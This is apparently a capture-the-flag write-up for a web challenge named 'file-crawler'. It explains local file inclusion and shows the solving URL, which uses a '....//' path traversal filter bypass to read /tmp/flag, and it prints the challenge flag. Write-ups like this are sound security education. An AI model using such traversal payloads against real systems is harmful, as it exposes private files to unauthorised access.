file-crawler

Find the vulnerability and get the flag. The flag is located in a temporary folder.

First of all visit the site and see how it looks like. This is a basic web page, and if you see the source code you will find the source path of image. I access the image and then I try some local file inclusion payloads to see the content of another file in the local machine.

Local File Inclusion(LFI) it is a common vulnerability that permits to see the content of a file on a local machine.

After some tries I received the flag using a filter bypass trick. In description said the flag is located in a temporary folder, so it might be /tmp/flag

http://34.159.187.220:32586/local?image_name=....//....//....//....//....//....//tmp/flag

Flag

CTF{0caec419d3ad1e1f052f06bae84d9106b77d166aae899c6dbe1355d10a4ba854}

Resources

WSTG - v4.2 | OWASP Foundation

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#file-inclusion

Previousflag-is-hidden Nextreccon

Last updated 1 year ago